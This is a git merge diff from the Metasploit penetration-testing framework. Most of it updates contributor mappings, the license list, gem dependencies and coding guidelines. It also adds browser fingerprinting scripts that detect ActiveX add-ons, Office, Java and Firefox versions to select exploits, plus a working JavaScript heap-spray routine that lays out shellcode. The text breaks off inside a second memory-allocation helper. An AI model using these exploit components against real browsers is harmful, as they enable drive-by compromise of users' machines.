Merge remote-tracking branch 'upstream/master' into getaddrinfo

.gitignore

@@ -41,3 +41,13 @@ tags
 *~
 # Ignore backups of retabbed files
 *.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release

.mailmap

@@ -1,50 +1,54 @@
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry.volatile@gmail.com>
-bperry-r7 <bperry-r7@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 bturner-r7 <bturner-r7@github>     Brandon Turner <brandon_turner@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 dmaloney-r7 <dmaloney-r7@github>   David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>   David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
 ecarey-r7 <ecarey-r7@github>       Erran Carey <e@ipwnstuff.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hd_moore@rapid7.com>
 hmoore-r7 <hmoore-r7@github>       HD Moore <hdm@digitaloffense.net>
-jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
-jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
 jlee-r7 <jlee-r7@github>           egypt <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
+joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
 joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
+jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan_vazquez@rapid7.com>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
 shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
 tasos-r7 <tasos-r7@github>         Tasos Laskos <Tasos_Laskos@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <tod_beardsley@rapid7.com>
 todb-r7 <todb-r7@github>           Tod Beardsley <todb@metasploit.com>
-wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
+wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>
 
-# Above this line are current Rapid7 employees Below this paragraph are
+# Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
 # one time or another, had some largeish number of commits landed on
 # rapid7/metasploit-framework master branch.  This should be refreshed
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.
 
+bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry.volatile@gmail.com>
+Brandon Perry <brandonprry@github>     Brandon Perry <bperry@bperry-rapid7.(none)>
 Brian Wallace <bwall@github>           (B)rian (Wall)ace <nightstrike9809@gmail.com>
 Brian Wallace <bwall@github>           Brian Wallace <bwall@openbwall.com>
+ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
-Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
-Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
-bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
-ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
-corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 corelanc0d3er <corelanc0d3er@github>   corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
+h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
 jcran <jcran@github>                   Jonathan Cran <jcran@0x0e.org>
 jcran <jcran@github>                   Jonathan Cran <jcran@rapid7.com>
 jduck <jduck@github>                   Joshua Drake <github.jdrake@qoop.org>
@@ -56,11 +60,16 @@ kris <kris@???>                        kris <>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
+Meatballs1 <Meatballs1@github>         Ben Campbell <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs <eat_meatballs@hotmail.co.uk>
+Meatballs1 <Meatballs1@github>         Meatballs1 <eat_meatballs@hotmail.co.uk> 
 mubix <mubix@github>                   Rob Fuller <jd.mubix@gmail.com>
 nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
 nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
+OJ <oj@github>                         OJ Reeves <oj@buffered.io>
+OJ <oj@github>                         OJ <oj@buffered.io>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane

.rspec

@@ -1,2 +1,2 @@
 --color
---format documentation
+--format Fivemat

Gemfile

@@ -40,6 +40,8 @@ group :development, :test do
 	# Version 4.1.0 or newer is needed to support generate calls without the
 	# 'FactoryGirl.' in factory definitions syntax.
 	gem 'factory_girl', '>= 4.1.0'
+# Make rspec output shorter and more useful
+	gem 'fivemat', '1.2.1'
 	# running documentation generation tasks and rspec tasks
 	gem 'rake', '>= 10.0.0'
 end

Gemfile.lock

@@ -18,6 +18,7 @@ GEM
     diff-lcs (1.2.4)
     factory_girl (4.2.0)
       activesupport (>= 3.0.0)
+    fivemat (1.2.1)
     i18n (0.6.5)
     json (1.8.0)
     metasploit_data_models (0.16.6)
@@ -62,6 +63,7 @@ DEPENDENCIES
   activesupport (>= 3.0.0)
   database_cleaner
   factory_girl (>= 4.1.0)
+  fivemat (= 1.2.1)
   json
   metasploit_data_models (~> 0.16.6)
   msgpack

HACKING

@@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
 need user input, you can either register an option or expose an 
 interactive session type specific for the type of exploit.
 
-3. Don't use "sleep". It has been known to cause issues with
+3. Always use Rex sockets, not ruby sockets.  This includes
-multi-threaded programs on various platforms running an older version of
-Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
-Rex.sleep() throughout the framework. We have found this works around
-the underlying issue.
-
-4. Always use Rex sockets, not ruby sockets.  This includes
 third-party libraries such as Net::Http.  There are several very good
 reasons for this rule.  First, the framework doesn't get notified on
 the creation of ruby sockets and won't know how to clean them up in
@@ -54,22 +48,23 @@ already implemented with Rex and if the protocol you need is missing,
 porting another library to use them is straight-forward.  See our
 Net::SSH modifications in lib/net/ssh/ for an example.
 
-5. When opening an IO stream, always force binary with "b" mode (or
+4. When opening an IO stream, always force binary with "b" mode (or
 using IO#binmode). This not only helps keep Windows and non-Windows
 runtime environments consistent with each other, but also guarantees
 that files will be treated as ASCII-8BIT instead of UTF-8.
 
-6. Don't use String#[] for a single character.  This returns a Fixnum in
+5. Don't use String#[] for a single character.  This returns a Fixnum in
 ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
   str[idx,1]
 which always returns a String.  If you need the ASCII byte, unpack it like
 so:
-	str[idx,1].unpack("C")[0]
+  tr[idx,1].unpack("C")[0]
 
-7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
+6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
 The '<<' operator is significantly faster. The difference will become
 even more apparent when doing string manipulation in a loop. The
 following table approximates the underlying implementation:
+
         Ruby            Pseudo-C
         -----------     ----------------
         a = b + c       a = malloc(b.len+c.len+1);
@@ -80,23 +75,19 @@ following table approximates the underlying implementation:
         a << c          a = realloc(a, a.len+c.len+1);
                         memcpy(a+a.len, c, c.len);
                         a[a.len + c.len] = '\0';
+
 Note that the original value of 'b' is lost in the second case. Care
 must be taken to duplicate strings that you do not want to modify.
 
-8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
+7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
 excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
 for an overview of common and not-so-common Ruby version related gotchas.
 
-9. Never, ever use $global variables. This applies to modules, mixins,
+8. Never, ever use $global variables. This applies to modules, mixins,
 and libraries. If you need a "global" within a specific class, you can
 use @@class_variables, but most modules should use @instance variables
 to store information between methods. 
 
-10. Do not define CONSTANTS within individual modules. This can lead to
-warning messages when the module is reloaded. Try to keep constants
-inside libraries and mixins instead.
-
-
 Creating New Modules
 ====================
 

LICENSE

@@ -12,7 +12,7 @@ License: BSD-3-clause
 #
 # This license does not apply to third-party components detailed below.
 #
-# Last updated: 2013-Mar-25
+# Last updated: 2013-Nov-04
 #
 
 Files: data/john/*
@@ -166,230 +166,6 @@ Files: lib/fastlib.rb
 Copyright: 2011, Rapid7 Inc.
 License: Ruby
 
-Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
-Copyright: 2006-2007, Francis Cianfrocca
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
-Copyright: Marc-Andre Cournoyer
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
-Copyright: 2007-2012, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
-Copyright: 2006-2010, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
-License: LGPL-2.1
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
-Copyright: 2006-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
-Copyright: 2007 David Heinemeir Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
-Copyright: 2011 Ben Johnson of Binary Logic
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
-Copyright: 2008-2012 Jonas Nicklas
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
-Copyright: 2010 Willem van Bergen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: Rob Aldred
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
-Copyright: 2005-2012 Thomas Uehlinger
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
-Copyright: 2006-2011 kuwata-lab.com all rights reserved
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
-Copyright: 2008-2010
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
-Copyright: 2011 Travis Tilley
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
-Copyright: 2011 Sam Stephenson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
-Copyright: 2010-2012 John Crepezzi
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
-Copyright: 2011 Aaron Patternson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
-Copyright: 2010 Andre Arko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
-Copyright: 2005, 2006 Tobias Luetke
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
-Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
-Copyright: 2011 John Mair (banisterfiend)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
-Copyright: 2007 Clifford Heath
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
-Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
-Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
-Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
-Copyright: 2010 Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
-Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
-Copyright: No copyright statement provided
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
-Copyright: 2012 Lee Jarvis
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
-Copyright: 2009 Tim Harper
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
-Copyright: 2011 Sam Stephenson, Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
-Copyright: 2006-2012 Aaron Pfeifer
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
-Copyright: 2008 Yehuda Katz
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
-Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
-Copyright: 2007 Nathan Sobo
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause
 
+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
  Redistribution and use in source and binary forms, with or without modification,
  are permitted provided that the following conditions are met:

data/js/detect/ie_addons.js

@@ -0,0 +1,89 @@
+window.ie_addons_detect = { };
+
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+window.ie_addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+window.ie_addons_detect.getMsOfficeVersion = function () {
+  var version;
+  var types = new Array();
+  for (var i=1; i <= 5; i++) {
+    try {
+      types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+    }
+    catch (e) {
+      types[i-1] = null;
+    }
+  }
+
+  if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+      types[3] == 'object' && types[4] == 'object')
+  {
+    version = "2012";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == 'object' && types[4] == null)
+  {
+    version = "2010";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2007";
+  }
+  else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    version = "2003";
+  }
+  else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+           types[3] == null && types[4] == null)
+  {
+    // If run for the first time, you must manullay allow the "Microsoft Office XP"
+    // add-on to run. However, this prompt won't show because the ActiveXObject statement
+    // is wrapped in an exception handler.
+    version = "xp";
+  }
+  else {
+    version = null;
+  }
+
+  return version;
+}

data/js/detect/misc_addons.js

@@ -0,0 +1,64 @@
+window.misc_addons_detect = { };
+
+/**
+ * Returns the Java version
+ **/
+window.misc_addons_detect.getJavaVersion = function () {
+	var foundVersion = null;
+
+	//
+	// This finds the Java version from Java WebStart's ActiveX control
+	// This is specific to Windows
+	//
+	for (var i1=0; i1 < 10; i1++) {
+	for (var i2=0; i2 < 10; i2++) {
+	for (var i3=0; i3 < 10; i3++) {
+	for (var i4=0; i4 < 10; i4++) {
+		var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
+		var progId = "JavaWebStart.isInstalled." + version;
+		try {
+			new ActiveXObject(progId);
+			return version;
+		}
+		catch (e) {
+			continue;
+		}		
+	}}}}
+
+	//
+	// This finds the Java version from window.navigator.mimeTypes
+	// This seems to work pretty well for most browsers except for IE
+	//
+	if (foundVersion == null) {
+		var mimes = window.navigator.mimeTypes;
+		for (var i=0; i<mimes.length; i++) {
+			var m = /java.+;version=(.+)/.exec(mimes[i].type);
+			if (m) {
+				var version = parseFloat(m[1]);
+				if (version > foundVersion) {
+					foundVersion = version;
+				}
+			}
+		}
+	}
+
+	//
+	// This finds the Java version from navigator plugins
+	// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
+	// So we do this last.
+	//
+	if (foundVersion == null) {
+		var foundJavaString = "";
+		var pluginsCount = navigator.plugins.length;
+		for (i=0; i < pluginsCount; i++) {
+			var pluginName = navigator.plugins[i].name;
+			var pluginVersion = navigator.plugins[i].version;
+			if (/Java/.test(pluginName) && pluginVersion != undefined) {
+				foundVersion = navigator.plugins[i].version;
+				break;
+			}
+		}
+	}
+
+	return foundVersion;
+}

data/js/detect/os.js

@@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
 		return d.style[propCamelCase] === css;
 	}
 
+	var input_type_is_valid = function(input_type) {
+		if (!document.createElement) return false;
+		var input = document.createElement('input');
+		input.setAttribute('type', input_type);
+		return input.type == input_type;
+	}
+
 	//--
 	// Client
 	//--
@@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
 		// Thanks to developer.mozilla.org "Firefox for developers" series for most
 		// of these.
 		// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
-		if ('HTMLTimeElement' in window) {
+		if (css_is_valid('background-attachment',
-			ua_version = '22.0'
+		                 'backgroundAttachment',
+		                 'local')) {
+			ua_version = '25.0';
+		} else if ('DeviceStorage' in window && window.DeviceStorage &&
+				'default' in window.DeviceStorage.prototype) {
+			// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+			ua_version = '24.0';
+		} else if (input_type_is_valid('range')) {
+			ua_version = '23.0';
+		} else if ('HTMLTimeElement' in window) {
+			ua_version = '22.0';
 		} else if ('createElement' in document &&
 		           document.createElement('main') &&
 		           document.createElement('main').constructor === window['HTMLElement']) {
-			ua_version = '21.0'
+			ua_version = '21.0';
 		} else if ('imul' in Math) {
-			ua_version = '20.0'
+			ua_version = '20.0';
 		} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
-			ua_version = '19.0'
+			ua_version = '19.0';
 		} else if ('devicePixelRatio' in window) {
-			ua_version = '18.0'
+			ua_version = '18.0';
 		} else if ('createElement' in document &&
 		           document.createElement('iframe') &&
 		           'sandbox' in document.createElement('iframe')) {
-			ua_version = '17.0'
+			ua_version = '17.0';
 		} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
-			ua_version = '16.0'
+			ua_version = '16.0';
 		} else if ('HTMLSourceElement' in window && 
 		           HTMLSourceElement.prototype &&
 		           'media' in HTMLSourceElement.prototype) {
-			ua_version = '15.0'
+			ua_version = '15.0';
 		} else if ('mozRequestPointerLock' in document.body) {
-			ua_version = '14.0'
+			ua_version = '14.0';
 		} else if ('Map' in window) {
-			ua_version = "13.0"
+			ua_version = "13.0";
 		} else if ('mozConnection' in navigator) {
 			ua_version = "12.0";
 		} else if ('mozVibrate' in navigator) {
@@ -850,6 +867,12 @@ window.os_detect.getVersion = function(){
 				os_flavor = "7";
 				os_sp = "SP1";
 				break;
+			case "10016720":
+				// IE 10.0.9200.16721 / Windows 7 SP1
+				ua_version = "10.0";
+				os_flavor = "7";
+				os_sp = "SP1";
+				break;
 			case "1000":
 				// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
 				ua_version = "10.0";

data/js/memory/heap_spray.js

@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+  var index;
+  var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+  var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+  while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+  while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+  var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+  while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+  retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+  var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+  for (index = 0; index < heapBlockCnt; index++) {
+    memory[index] = retSlide + shellcode;
+  }
+}

data/js/memory/mstime_malloc.js

@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+  var shellcode     = oArg.shellcode;
+  var offset        = oArg.offset;
+  var heapBlockSize = oArg.heapBlockSize;
+  var objId         = oArg.objId;
+
+  if (shellcode     == undefined) { throw "Missing argument: shellcode"; }
+  if (offset        == undefined) { offset = 0; }
+  if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+  var buf = "";
+  for (var i=0; i < heapBlockSize/4; i++) {
+    if (i == offset) {
